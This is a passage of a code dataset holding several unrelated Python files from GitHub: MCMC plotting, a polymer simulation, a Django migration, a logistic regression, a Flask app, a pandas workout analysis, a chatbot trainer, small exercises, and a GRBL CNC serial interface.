range(ndim):\n # plotting the accepted chain and their respective burnin\n ax[n].plot(chk[:,n].T, color=c, lw=0.1, alpha=1.0)\n ax[n].scatter([0], chk[0, n], color=c, marker='>')\n\n fig.tight_layout(h_pad=0.0)\n\n# samples = reduce(lambda a,b: np.append(a,b, axis=0), ch)\n samples = np.vstack(ch)\n\n best_ind = np.unravel_index(ln.argmax(), ln.shape)\n best_chi2 = -2 * ln[best_ind]\n xopt = ch[best_ind]\n\n if k == ntemps-1:\n fig_corner = corner.corner(samples, bins=50, smooth=1, color=c,\n labels=['{}'.format(l) for l in labels],\n quantiles=[0.16, 0.5, 0.84], show_titles=True,\n truths=xopt,\n title_kwargs={\"fontsize\": 12})\n else:\n corner.corner(samples, bins=50, smooth=1, color=c,\n labels=['{}'.format(l) for l in labels],\n quantiles=[0.16, 0.5, 0.84], show_titles=True,\n truths=xopt,\n title_kwargs={\"fontsize\": 12},\n fig = fig_corner)\n\n\ndef ptmcmc_results(ndim, chain, lnprob, acc, labels):\n\n # chains of lowest temperature\n chain = chain[0]\n lnprob = lnprob[0]\n acc = acc[0]\n\n # acceptance fraction cut\n tracc = (0.15, 0.8)\n ind = np.where(np.logical_or(acc < tracc[0], acc > tracc[1]))\n bam = chain[ind]\n chain = np.delete(chain, ind, axis=0)\n lnprob = np.delete(lnprob, ind, axis=0)\n\n# print 'shape chain:', chain.shape\n# print 'shape lnprob:', lnprob.shape\n\n plt.figure('Acceptance fraction Results')\n plt.plot(acc)\n for thresh in tracc:\n plt.axhline(thresh, 
color='r', ls='--')\n\n # CONVERGENCE plot\n fig, ax = plt.subplots(ndim+1, 1, sharex=True, figsize=(7, 8),\n num='CONVERGENCE RESULTS')\n ax[-1].set_xlabel('Iterations')\n ax[-1].set_yscale('log')\n for a, l in zip(ax, labels + ('lnprob',)):\n a.set_ylabel(l)\n a.grid()\n\n # loop over the parameters\n for n in range(ndim):\n\n if len(bam) > 0:\n # plotting the chains discarded by the acceptance cut\n ax[n].plot(bam[:, :, n].T, color='r', lw=1., alpha=0.4)\n\n # by default : no cut\n\n burnin_list = np.ones(lnprob.shape[0], dtype='int') * 0\n\n# # convergence cut with mean\n# lnlncut = np.mean(np.log10(-lnprob))\n# burnin_list = list()\n# for lnk in lnprob:\n# try:\n# burn = np.where(np.log10(-lnk) > lnlncut)[0][-1] + 100\n# except:\n# burn = 0\n# burnin_list.append(burn)\n#\n# ax[-1].axhline(np.power(10,lnlncut), color='r')\n\n # convergence cut with best prob\n lncut = 1.1 * lnprob.max()\n# lncut = -300\n ax[-1].axhline(-lncut, color='r')\n\n burnin_list = list()\n safe_burn = 100\n for lnk in lnprob:\n try:\n burn = np.where(lnk < lncut)[0][-1] + safe_burn\n except:\n print('Could not apply convergence cut properly')\n burn = safe_burn\n burnin_list.append(burn)\n\n # plotting the log10(-lnprob) array and the cut threshold\n ax[-1].plot(-lnprob.T, color='k')\n\n chain_ok_list = list()\n # loop over the chains\n for chk, brn, lnk in zip(chain, burnin_list, lnprob):\n\n # iterations array\n ite = range(chk.shape[0])\n\n # converged chain and saving it\n ite_ok = ite[brn:]\n chk_ok = chk[brn:, :]\n lnk_ok = lnk[brn:]\n chain_ok_list.append(chk_ok)\n\n # not converged chain\n ite_no = ite[:brn]\n chk_no = chk[:brn, :]\n\n # loop over the parameters\n for n in range(ndim):\n\n # plotting the accepted chain and their respective burnin\n ax[n].plot(ite_ok, chk_ok[:,n].T, color='b', lw=0.1, alpha=1.0)\n ax[n].plot(ite_no, chk_no[:,n].T, color='k', lw=0.1, alpha=0.4)\n ax[n].scatter([0], chk[0, n], color='r', marker='>')\n\n # plotting converged chain lnprob\n ax[-1].plot(ite_ok, -lnk_ok.T, color='b', lw=0.1, zorder=10)\n\n fig.tight_layout(h_pad=0.0)\n\n# samples = reduce(lambda a,b: np.append(a,b, axis=0), chain_ok_list)\n samples = np.vstack(chain_ok_list)\n\n best_ind = np.unravel_index(lnprob.argmax(), lnprob.shape)\n best_chi2 = -2 * lnprob[best_ind]\n xopt = chain[best_ind]\n\n\n# # checking the correlation\n# fig, ax = plt.subplots(2, sharex=True)\n# for a in ax:\n# a.grid()\n# a.set_xscale('log')\n# ax[1].set_xlabel('Iterations')\n# ax[1].set_ylabel('Corr p0')\n# ax[0].set_ylabel('p0')\n#\n# for c in chain[:,:,0]:\n# funk = emcee.autocorr.function(c)\n# ax[0].plot(c)\n# ax[1].plot(funk)\n\n # CORNER plot\n# aux_fig, ax = plt.subplots(ndim,ndim,num='CORNER', figsize=(ndim,ndim))\n fig = corner.corner(samples, bins=50, smooth=1,\n labels=['{}'.format(l) for l in labels],\n quantiles=[0.16, 0.5, 0.84], show_titles=True,\n truths=xopt,\n title_kwargs={\"fontsize\": 12})#, fig=aux_fig)\n fig.tight_layout()\n\n # quantiles of the 1d-histograms\n inf, med, sup = np.percentile(samples, [16, 50, 84], axis=0)\n\n # Analysis end message\n print(\"PTMCMC results :\")\n for n in range(ndim):\n print(labels[n]+'= {:.2e} + {:.2e} - {:.2e}'.format(\n med[n], sup[n]-med[n], med[n]-inf[n]\n ))\n for n in range(ndim):\n print(labels[n]+'\\in [{:.3e} , {:.3e}] with best at {:.3e}'.format(\n inf[n], sup[n], xopt[n]\n ))\n if not np.all(np.logical_and(inf Frame:\n if n <= 0:\n comp1 = f\"(X1)1((A1){m}){Nb//m-1}(A1){m}\"\n comp2 = f\"(X2)1((A2){m}){Nb//m-1}(A2){m}\"\n else:\n comp1 = 
f\"(X1)1((A1){m}[(A1){n}]){Nb//m-1}(A1){m}\"\n comp2 = f\"(X2)1((A2){m}[(A2){n}]){Nb//m-1}(A2){m}\"\n theta = (Nb + 1 + (Nb // m - 1) * n) * sigma\n lat = Lat(\n **{\n \"n_layers\": n_layers,\n \"geometry\": \"flat\",\n \"lowerbound\": \"surface\",\n \"upperbound\": \"surface\",\n }\n )\n mons = [\n Mon(**{\"name\": \"X1\", \"freedom\": \"pinned\", \"pinned_range\": \"1\"}),\n Mon(**{\"name\": \"A1\", \"freedom\": \"free\"}),\n Mon(**{\"name\": \"X2\", \"freedom\": \"pinned\", \"pinned_range\": str(n_layers)}),\n Mon(**{\"name\": \"A2\", \"freedom\": \"free\"}),\n Mon(**{\"name\": \"W\", \"freedom\": \"free\"}),\n ]\n mols = [\n Mol(**{\"name\": \"Water\", \"composition\": \"(W)1\", \"freedom\": \"solvent\"}),\n Mol(\n **{\n \"name\": \"pol1\",\n \"composition\": comp1,\n \"freedom\": \"restricted\",\n \"theta\": theta,\n }\n ),\n Mol(\n **{\n \"name\": \"pol2\",\n \"composition\": comp2,\n \"freedom\": \"restricted\",\n \"theta\": theta,\n }\n ),\n ]\n sys = Sys()\n chi = 0.0\n chi_list = {\"X1 W\": chi, \"A1 W\": chi, \"X2 W\": chi, \"A2 W\": chi}\n\n frame = Frame(lat, sys, mols, mons, chi_list=chi_list)\n frame.run()\n print(frame.profile_labels)\n\n return frame\n\n\nif __name__ == \"__main__\":\n params = [[160, 56, 10], [136, 54, 8], [112, 8, 1]]\n\n sigma = 0.01\n for p in params:\n Nb, n, m = p\n data = []\n theta = (Nb + 1 + (Nb // m - 1) * n) * sigma\n\n for n_layers in range(42, 116, 2):\n frame = brushes(Nb, n, m, n_layers, sigma)\n omega_L = np.sum(frame.profile[\"pol1\"] * frame.profile[\"pol2\"])\n if len(frame.profile[\"pol1\"]) % 2 == 0:\n first_layer = len(frame.profile[\"pol1\"]) // 2 + 1\n H = 2 * (\n np.sum(\n frame.profile[\"pol1\"][first_layer:]\n * (frame.profile[\"layer\"][first_layer:] + 0.5 - first_layer)\n )\n / np.sum(frame.profile[\"pol1\"][first_layer:])\n )\n data.append(\n [n_layers, H, omega_L, frame.stats[\"sys : name : free energy\"]]\n )\n print(n_layers)\n\n data = np.array(data).T\n path = os.path.abspath(__file__)\n np.savetxt(f\"{path[:path.rfind('/',2)]}/Nb{Nb}n{n}m{m}.txt\", data)\n \n","repo_name":"IvanMikhailovIMCRAS/brush_penetration","sub_path":"brush_penetration/brush_penetration.py","file_name":"brush_penetration.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20687487396","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('contrib', '0039_alter_field_url_on_menuextra'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='defensoria',\r\n name='pode_cadastrar_atividade_extraordinaria',\r\n field=models.BooleanField(default=False, help_text='Habilita CRUD de Atividade Extraordin\\xe1ria no painel do Defensor Atuante', verbose_name='Pode cadastrar Atividade Extraordin\\xe1ria?'),\r\n ),\r\n migrations.AlterField(\r\n model_name='menuextra',\r\n name='url',\r\n field=models.URLField(blank=True),\r\n ),\r\n ]\r\n","repo_name":"SegurancaDPDF/SOLAR-Backend","sub_path":"contrib/migrations/0040_atividades_extraordinarias.py","file_name":"0040_atividades_extraordinarias.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15683331510","text":"N = list(map(int, input().split()))\nx = min(N)\nwhile True:\n cnt = 0\n for i in range(5):\n if x % N[i] == 0:\n cnt += 1\n if cnt > 
2:\n print(x)\n break\n x += 1\n","repo_name":"Jihyun-Choi/Algorithm","sub_path":"BOJ/python/math/1145.py","file_name":"1145.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24029161417","text":"import numpy as np\n\n\nclass LogisticRegression(object):\n def __init__(self, tol=0.001, max_iter=1000, penalty='norm', C=1):\n \"\"\"\n self.weights weight\n self.tol threshold\n self.max_iter maximum iteration\n self.C Regularization term before coefficients\n self.penalty regularization\n \"\"\"\n self.weights = None\n self.tol = tol\n self.max_iter = max_iter\n self.C = C\n self.penalty = penalty\n\n def sigmoid(self, z):\n return 1 / (1 + np.exp(-z))\n\n # same as sklearn.fit\n def fit(self, dataMatIn, classLabels):\n dataMatrix = np.mat(dataMatIn) # matrix\n labelMat = np.mat(classLabels)\n m, n = np.shape(dataMatrix) # dim\n self.weights = np.ones((n, 1)) # init: 1\n\n for i in range(self.max_iter):\n # Assume that the function\n h = self.sigmoid(dataMatrix * self.weights) # compress to 0-1, pos/neg\n # Regularization term, according to the gradient metric inferred, without the regularization term, L1 regular, L2 regular parameter update logic\n if self.penalty == 'norm':\n # matrix multiple (sample few, x grient down)\n self.weights = self.weights + self.tol * dataMatrix.transpose() * (labelMat - h)\n elif self.penalty == 'l1':\n # lambda\n self.weights = self.weights + self.C * self.tol * np.where(self.weights > 0, 1, -1) + self.tol * dataMatrix.transpose() * (labelMat - h)\n elif self.penalty == 'l2':\n self.weights = self.weights * (1 - self.C * self.tol) + self.tol * dataMatrix.transpose() * (labelMat - h)\n\n # Same role as sklearn.predict_pro, return probability\n def predict_pro(self, dataMatIn):\n dataMatrix = np.mat(dataMatIn)\n return self.sigmoid(dataMatrix * self.weights)\n\n # Same role as sklearn.predict, return category\n def predict(self, dataMatIn):\n dataMatrixPro = self.predict_pro(dataMatIn)\n return np.where(dataMatrixPro >= 0.5, 1, 0).reshape(len(dataMatIn), )\n\n # Same as sklearn.score, accuracy\n def score(self, dataMatIn, classLabels):\n yhat = self.predict(dataMatIn).reshape(len(dataMatIn), )\n y = np.array(classLabels).reshape(len(classLabels), )\n return np.sum(np.where((yhat == y) == True, 1, 0)) / len(y)\n\n\n# calculate accuracy score\ndef accuracy_score(y, yhat):\n y = np.array(y).reshape(len(y), )\n yhat = np.array(yhat).reshape(len(yhat), )\n return np.sum(np.where((yhat == y) == True, 1, 0)) / len(y)\n\n\n# calculate precision score\ndef precision_score(y, yhat):\n y = np.array(y).reshape(len(y), )\n yhat = np.array(yhat).reshape(len(yhat), )\n return sum(yhat * y) / np.sum(yhat)\n\n\n# calculate recall score\ndef recall_score(y, yhat):\n y = np.array(y).reshape(len(y), )\n yhat = np.array(yhat).reshape(len(yhat), )\n return sum(yhat * y) / np.sum(y)\n\n\n# calculate f1 score\ndef f1_score(y, yhat):\n p = precision_score(y, yhat)\n r = recall_score(y, yhat)\n return 2 * p * r / (p + r)\n\n\n# calculate confusion matrix\ndef confusion_matrix(y, yhat):\n y = np.array(y).reshape(len(y), )\n yhat = np.array(yhat).reshape(len(yhat), )\n num1 = sum(yhat * y)\n num2 = sum(np.where(yhat == 0, 1, 0) * y)\n num3 = sum(np.where(y == 0, 1, 0) * yhat)\n num4 = sum(np.where(y == 0, 1, 0) * np.where(yhat == 0, 1, 0))\n return np.array([[num4, num3], [num2, 
num1]])\n","repo_name":"shixun404/CS235_Obesity_Detection","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"70998794812","text":"import random\n\ndef lotteryNumbers():\n listOfNumbers = []\n\n while len(listOfNumbers) < 5:\n a = random.randint(1,70)\n if a not in listOfNumbers:\n listOfNumbers.append(a)\n listOfNumbers.sort()\n\n m = random.randint(1,25)\n listOfNumbers.append(m)\n return listOfNumbers\n\nprint(lotteryNumbers())\n\n\n# pool = list(range(1, 71))\n# random.sample(pool, 5)\n\n","repo_name":"cthompson7/MIS3640","sub_path":"Session14/in-class-IO-TA.py","file_name":"in-class-IO-TA.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24866671333","text":"from flask import Flask, render_template, redirect\nimport time\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n # Render the loading screen template\n return render_template('loading.html')\n\n@app.route('/home')\ndef home():\n products = [\n {\"title\": \"Product 1\", \"description\": \"Description 1\", \"price\": \"9.99\"},\n {\"title\": \"Product 2\", \"description\": \"Description 2\", \"price\": \"19.99\"},\n {\"title\": \"Product 3\", \"description\": \"Description 3\", \"price\": \"29.99\"},\n ]\n # Simulate a delay or time-consuming task\n \n # Render the home template with the products data\n return render_template('home.html', products=products)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"desalvatoredaniel/philanthropicthrift","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17034655627","text":"import pandas as pd\nimport uni\n\n\nworkouts = pd.read_csv('workouts.csv')\npayments = pd.read_excel('payments.xlsx')\nusers = pd.read_excel('users.xlsx')\nworkouts.reset_index()\n# print(users.loc[[4268, 4272]]) # достаем данные из строк 4268 и 4272\n# print(users.loc[[4268, 4272], ['region', 'first_contact_datetime']]) # достаем только столбцы region и first_contact_datetime для строк 4268 и 4272\n# print(users.loc[users['geo_group'] == 'Москва']) # фильтрация данных по городу Москва\n# print(users.loc[users['age'] <= 30.0].head) # выведет все данные о пользователях младше 30 (включительно)\npd.to_datetime(payments['payment_date']) # изменили данные в колонке, но только на эту итерацию, в DataFrame они не изменились\npayments['payment_date'] = pd.to_datetime(payments['payment_date']) # изменили данные в DataFrame\nworkouts['start_at'] = pd.to_datetime(workouts['start_at'])\nusers.groupby('geo_group')['age'].max() # находим максимальный возраст тренирующихся по гео-группе\nworkouts.groupby('trainer_department')['client_id'].nunique() # узнаем кол-во клиентов у которых занятия проводили тренеры из разных департаментов\nworkouts.reset_index(inplace=True) # переносим индекс в колонку\nworkouts.groupby('trainer_department')['workout_id'].nunique() # какое кол-во занятий провели тренеры разных департаментов\nworkouts.groupby(['trainer_department', 'workout_type'])['workout_id'].nunique() # какое кол-во занятий провели тренеры разных департаментов по разным типам тренировок\nworkouts['client_id'].groupby(workouts['start_at'].dt.month).nunique() # сколько клиентов пришли на тренировки 
помесячно\nworkouts['cost'].agg(['count', 'mean', 'median']) # выводим сразу несколько показателей (только те, что нам нужны)\nworkouts.agg(\n {\n 'cost': ['count', 'mean', 'median'],\n 'workout_id': ['count', 'nunique']\n }\n) # считаем для разных столбцов разные статистики (показатели/ агрегаты)\n\nfirst_payments = payments.groupby('user_id')['payment_date'].min()\nfirst_workout = workouts.groupby('client_id')['start_at'].min()\n# pd.merge(payments, users) # объединение таблиц\nworkouts_users = pd.merge(workouts, users, how='left', left_on='client_id', right_on='user_id')\n\nfirst_payments = first_payments.reset_index()\nfirst_workout = first_workout.reset_index()\nusers_info = pd.merge(first_payments, first_workout, how='inner', left_on='user_id', right_on='client_id')\n\n# добавление колонок\npayments['version'] = 1\npayments['fix_rate'] = 73\npayments['amount_usd'] = payments['amount'] / payments['fix_rate']\n\nusers_info['date_diff'] = users_info['payment_date'] - users_info['start_at']\nusers_info.sort_values(by='date_diff') # сортировка по колонке date_diff по умолчанию (по возрастанию)\nusers_info.sort_values(by='date_diff', ascending=False) # сортировка по колонке date_diff по убыванию\n\n\nmean_value = users_info['date_diff'].mean()\ndef checher(datediff_in_days):\n if datediff_in_days < mean_value:\n return 'Быстрый'\n else:\n return 'Медленный'\n\n\nusers_info['client_type'] = users_info['date_diff'].apply(checher)\n\nusers_info.to_excel('user_info.xlsx')\n\nwriter = pd.ExcelWriter('all_data.xlsx')\nusers_info.to_excel(writer, sheet_name='payments')\npayments.to_excel(writer, sheet_name='payments')\nusers.to_excel(writer, sheet_name='users')\nworkouts.to_excel(writer, sheet_name='workouts')\n\nwriter.save()\n\n\nprint(users_info)\n\n\n","repo_name":"BariGisher20/Python--","sub_path":"PANDAS/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35302569501","text":"import json\r\nimport nltk\r\nimport numpy as np\r\nfrom nltk.stem import WordNetLemmatizer\r\nlem=WordNetLemmatizer()\r\nimport tensorflow\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense,Embedding,LSTM,Flatten\r\nimport pickle\r\n\r\n\r\n\r\n'''extracting the data set'''\r\nwith open('intents.json','r') as f:\r\n data=json.load(f)\r\n\r\n'''assigning the data'''\r\nwords=[]\r\ndocument=[]\r\nclasses=[]\r\nign=['?','.','!',',']\r\nfor intent in data['intents']:\r\n for pattern in intent['patterns']:\r\n w=nltk.word_tokenize(pattern)\r\n words.extend(w)\r\n document.append((w,intent['tag']))\r\n if intent['tag'] not in classes:\r\n classes.append(intent['tag'])\r\ndoc=[]\r\nfor d in document:\r\n\tdoc.append(d[0])\r\n\r\n\r\n'''szorting the data'''\r\nwords=[lem.lemmatize(w.lower())for w in words if w not in ign]\r\nwords=sorted(list(set(words)))\r\nclasses=sorted(list(set(classes)))\r\n\r\nlists=[]\r\ndef reemovNestings(l): \r\n for i in l: \r\n if type(i[0]) == list: \r\n reemovNestings(i) \r\n else:\r\n a=''\r\n for j in i:\r\n a=a+' '+ j\r\n lists.append(a)\r\nreemovNestings(doc)\r\n\r\n\r\n'''creating files'''\r\n\r\npickle.dump(words,open('word.pkl','wb'))\r\npickle.dump(classes,open('classes.pkl','wb'))\r\n\r\n'''training'''\r\n\r\ntraining=[]\r\noutput=[0]*len(classes)\r\ndef reemovNestings(l): \r\n for i in l: \r\n if type(i[0]) == list: \r\n reemovNestings(i) \r\n else:\r\n a=''\r\n for j in i:\r\n a=a+' '+ j\r\n 
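# inner loop finished: store the space-joined pattern string\r\n            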
output.append(a)\r\nreemovNestings(doc)\r\nprint(output)\r\nmax_len=7\r\nencoded_words=[]\r\nencoded_words=[one_hot(w, size,filters='!?',lower=True) for w in lists]\r\npadded_sentence=pad_sequences(encoded_words,max_len,padding='post')\r\n\r\nfor doc in document:\r\n out=list(output)\r\n out[classes.index(doc[1])]=1\r\n training.append([out])\r\n\r\n\r\ntraining=np.array(training)\r\ntrain_y=list(training)\r\ntrain_y=np.array(train_y)\r\n\r\n\r\n'''model creation'''\r\n\r\nmodel=Sequential()\r\nmodel.add(Embedding(input_dim=100,output_dim=200,input_length=max_len))\r\nmodel.add(LSTM(128,return_sequences=True))\r\nmodel.add(Dense(128,activation='relu'))\r\nmodel.add(LSTM(128,return_sequences=True))\r\nmodel.add(Dense(128,activation='relu'))\r\nmodel.add(LSTM(128,return_sequences=True))\r\nmodel.add(Dense(128,activation='relu'))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(len(classes),activation='softmax'))\r\n\r\nmodel.compile(loss='categorical_crossentropy',optimizer='Adam',metrics=['accuracy'])\r\n\r\nmodel.fit(padded_sentence,train_y,epochs=100,verbose=1)\r\n\r\nmodel.save('chatbot.h5')\r\n \r\n\r\n\r\n","repo_name":"Arjunprasaath/chatbot","sub_path":"chatbot_alg.py","file_name":"chatbot_alg.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4098262780","text":"#!/usr/bin/python -t\n\n\n# array\n# time O(n)\n# space O(1)\n\nclass Solution:\n def summaryRanges(self, nums: List[int]) -> List[str]:\n ret = []\n i = 0\n\n while i < len(nums):\n start = nums[i]\n\n while i+1 < len(nums) and nums[i] + 1 == nums[i+1]:\n i += 1\n\n if nums[i] != start:\n ret.append(str(start) + \"->\" + str(nums[i]))\n else:\n ret.append(str(nums[i]))\n\n i += 1\n\n return ret\n\nclass Solution(object):\n def summaryRanges(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[str]\n \"\"\"\n n = len(nums)\n ret = []\n if n == 0:\n return ret\n index = 0\n i = 0\n \n while i < n:\n start = i\n end = i\n \n while end < n -1 and (nums[end]+1 == nums[end+1]):\n end = end + 1\n \n if end > start:\n s = str(nums[start]) + \"->\" + str(nums[end])\n #ret.append(s)\n else:\n s = str(nums[start])\n ret.append(s)\n i = end + 1\n \n return ret\n\n","repo_name":"boknowswiki/mytraning","sub_path":"lc/python/228_summary_ranges.py","file_name":"228_summary_ranges.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"70873670333","text":"working_day_events = input().split('|')\nenergy = 100\ncoins = 100\nis_open = True\n\nfor events in working_day_events:\n events = events.split('-')\n event_or_ingredient = events[0]\n number = int(events[1])\n\n if event_or_ingredient == 'rest':\n if (energy + number) >= 100:\n print(f'You gained {energy - 100} energy.')\n energy = 100\n else:\n print(f'You gained {number} energy.')\n energy += number\n\n print(f'Current energy: {energy}.')\n\n elif event_or_ingredient == 'order':\n if (energy - 30) >= 0:\n print(f'You earned {number} coins.')\n coins += number\n energy -= 30\n else:\n print(f'You had to rest!')\n energy += 50\n\n else:\n if (coins - number) > 0:\n print(f'You bought {event_or_ingredient}.')\n coins -= number\n else:\n print(f'Closed! 
Cannot afford {event_or_ingredient}.')\n is_open = False\n break\n\nif is_open:\n print(f'Day completed!\\nCoins: {coins}\\nEnergy: {energy}')\n","repo_name":"KaloyankerR/python-fundamentals-repository","sub_path":"Assignments/Lists Basics/Exercise/10. Bread Factory.py","file_name":"10. Bread Factory.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42815615634","text":"import threading\nimport time\nimport serial\nimport queue as Queue\nimport re\nimport logger\nimport datetime as dt\n\nRX_BUFFER_SIZE = 128\nBAUD_RATE = 115200\nENABLE_STATUS_REPORTS = True\nREPORT_INTERVAL = 1.0 # seconds\n\nverbose = True\n\nclass MachineInterface(object):\n\n def __init__(self, logger, port, baud, pollingInterval=.1):\n\n self.pollingInterval = pollingInterval\n self.logger = logger\n self.currentJob = None\n self.lastJob = None;\n\n # self.serialPort = serial.Serial(port, baud)\n self.serialPort = serial.Serial()\n self.serialPort.port = port\n self.serialPort.baudrate = 115200\n self.serialPort.timeout = 1\n self.serialPort.setDTR(False)\n self.serialPort.open()\n self.timer = dt.datetime.utcnow()\n\n # Wake up grbl\n self.serialPort.write(\"\\r\\n\\r\\n\".encode())\n time.sleep(2) # Wait for grbl to initialize\n self.serialPort.flushInput() # Flush startup text in serial input\n\n self.status = \"\"\n self.syncLock = threading.RLock()\n self.allowMdi = True\n self.runQueue = Queue.Queue()\n self.historyQueue = dict()\n self.jobId = 0\n self.machineStatus = dict(\n id=None, status=\"Idle\", type=\"\", error=\"\", errorCount=0, data=None)\n self.isShuttingDown = False\n\n self.thread = threading.Thread(target=self.run, args=[pollingInterval])\n self.thread.daemon = True # Daemonize thread\n self.thread.start() # Start the execution\n\n def shouldUpdateStatus(self):\n return (dt.datetime.utcnow() - self.timer).microseconds > 1000\n\n def shutdown(self):\n self.logger.debug(\"shutdown\")\n self.isShuttingDown = True\n self.logger.debug(\"drain queue\")\n self.runQueue.join()\n self.logger.debug(\"term bg thread\")\n self.thread.join()\n self.logger.debug(\"shutdown: done\")\n\n def setMachineStatus(self, status):\n self.logger.debug(\"set-machine-status\")\n self.syncLock.acquire()\n\n if (\"abort\" in status):\n self.machineStatus[\"abort\"] = status[\"abort\"]\n\n if (\"id\" in status):\n self.machineStatus[\"id\"] = status[\"id\"]\n\n if (\"type\" in status):\n self.machineStatus[\"type\"] = status[\"type\"]\n\n if (\"status\" in status):\n self.machineStatus[\"status\"] = status[\"status\"]\n\n if (\"error\" in status):\n self.machineStatus[\"error\"] = status[\"error\"]\n \n if (\"errorCount\" in status):\n self.machineStatus[\"errorCount\"] = status[\"errorCount\"]\n \n if (\"data\" in status):\n self.machineStatus[\"data\"] = status[\"data\"]\n\n self.syncLock.release()\n self.logger.debug(\"set-machine-status: done\")\n\n def getMachineStatus(self):\n return self.machineStatus\n\n def getStatus(self):\n self.syncLock.acquire()\n statusBuf = self.status\n self.syncLock.release()\n return statusBuf\n\n def getJob(self, jobId):\n if jobId in self.historyQueue:\n return self.historyQueue[jobId]\n return None\n\n def getEngineStatus(self):\n ljob = self.cloneJob(self.lastJob)\n cjob = self.cloneJob(self.currentJob)\n\n return dict(lastJob = ljob, currentJob = cjob)\n\n def cloneJob(self, job):\n\n if job is None:\n return dict()\n\n newJob = dict(id=job[\"id\"], type=job[\"type\"], 
eof=job[\"eof\"], status=job[\"status\"], result=job[\"result\"],\n errorCount=job[\"errorCount\"])\n\n if newJob[\"type\"] == \"mdi\":\n newJob[\"block\"] = job[\"block\"]\n else:\n newJob[\"fileName\"] = job[\"fileName\"]\n newJob[\"lineCount\"] = job[\"lineCount\"]\n newJob[\"charCounts\"] = job[\"charCounts\"]\n newJob[\"grblCount\"] = job[\"grblCount\"]\n\n return newJob\n\n def setStatus(self, status):\n self.logger.debug(\"set-status\")\n self.syncLock.acquire()\n self.status = status\n self.timer = dt.datetime.utcnow()\n self.syncLock.release()\n self.logger.debug(\"set-status: done\")\n\n def mdi(self, cmd, newLine, block=False):\n self.logger.debug(\"queue mdi command: \" + cmd)\n self.jobId = self.jobId + 1\n\n job = dict(id=self.jobId, type=\"mdi\", eof=0, status=0, result=\"\",\n block=cmd, errorCount=0, newLine=newLine)\n self.runQueue.put(job)\n\n if (block):\n while (job[\"status\"] == 0):\n time.sleep(0.05)\n return job[\"result\"]\n\n return job;\n\n def file(self, fileName):\n self.logger.debug(\"queue file job: \" + fileName)\n self.jobId = self.jobId + 1\n job = dict(id=self.jobId, type=\"file\", eof=0, status=0,\n fileName=fileName, lineCount=0, errorCount=0, fd=None, \n result=\"\", charCounts = 0, grblCount = 0 )\n self.runQueue.put(job)\n return self.cloneJob(job)\n\n def run(self, p):\n\n state = 0 # idle\n self.currentJob = None\n\n while state != 3:\n\n currentStatus = self.getMachineStatus()\n if (\"abort\" in currentStatus and currentStatus[\"abort\"]):\n # drain the queue\n draining = True\n self.logger.debug('abort detected, draining')\n while draining:\n try:\n jobIWontRun = self.runQueue.get(True, .01)\n\n except Queue.Empty:\n draining = False\n state = 0\n self.lastJob = self.currentJob\n self.lastJob[\"result\"] = \"aborted\"\n\n if state == 0:\n while (self.currentJob is None and not self.isShuttingDown):\n try:\n self.logger.debug('next job or sleep')\n self.currentJob = self.runQueue.get(True, 1)\n\n except Queue.Empty:\n self.logger.debug(\n \"timed waiting for job. 
housekeeping now\")\n\n if (self.shouldUpdateStatus()):\n self.exec_status()\n\n if (self.currentJob):\n self.logger.debug('run job : ' + str(self.currentJob[\"id\"]))\n state = 1\n\n if (self.isShuttingDown and self.currentJob is None):\n state = 3\n continue\n\n if (self.shouldUpdateStatus()):\n self.exec_status()\n\n # Doing real work\n if (self.currentJob[\"type\"] == \"mdi\"):\n self.setMachineStatus(\n dict(id=self.currentJob[\"id\"], status=\"Running\", type=\"mdi\", data=self.currentJob[\"block\"]))\n\n self.logger.debug('running mdi job ' + self.currentJob[\"block\"])\n self.currentJob[\"result\"] = self.exec_cmd(self.currentJob[\"block\"], self.currentJob[\"newLine\"])\n self.runQueue.task_done()\n self.currentJob[\"status\"] = 1\n state = 0\n self.lastJob = self.currentJob\n self.historyQueue[self.currentJob[\"id\"]] = self.currentJob\n self.currentJob = None\n self.setMachineStatus(dict(id=None, status=\"Idle\", type=\"\"))\n\n elif (self.currentJob[\"type\"] == \"file\" and self.currentJob[\"fd\"] == None):\n self.setMachineStatus(\n dict(id=self.currentJob[\"id\"], status=\"Running\", type=\"mdi\", data=self.currentJob[\"fileName\"]))\n\n self.logger.debug('starting file ' + self.currentJob[\"fileName\"])\n self.prep_file_job(self.currentJob)\n elif (self.currentJob[\"eof\"] >= 2):\n self.logger.debug('cleanup file ' + self.currentJob[\"fileName\"])\n self.runQueue.task_done()\n self.cleanup_file_job(self.currentJob)\n self.currentJob[\"status\"] 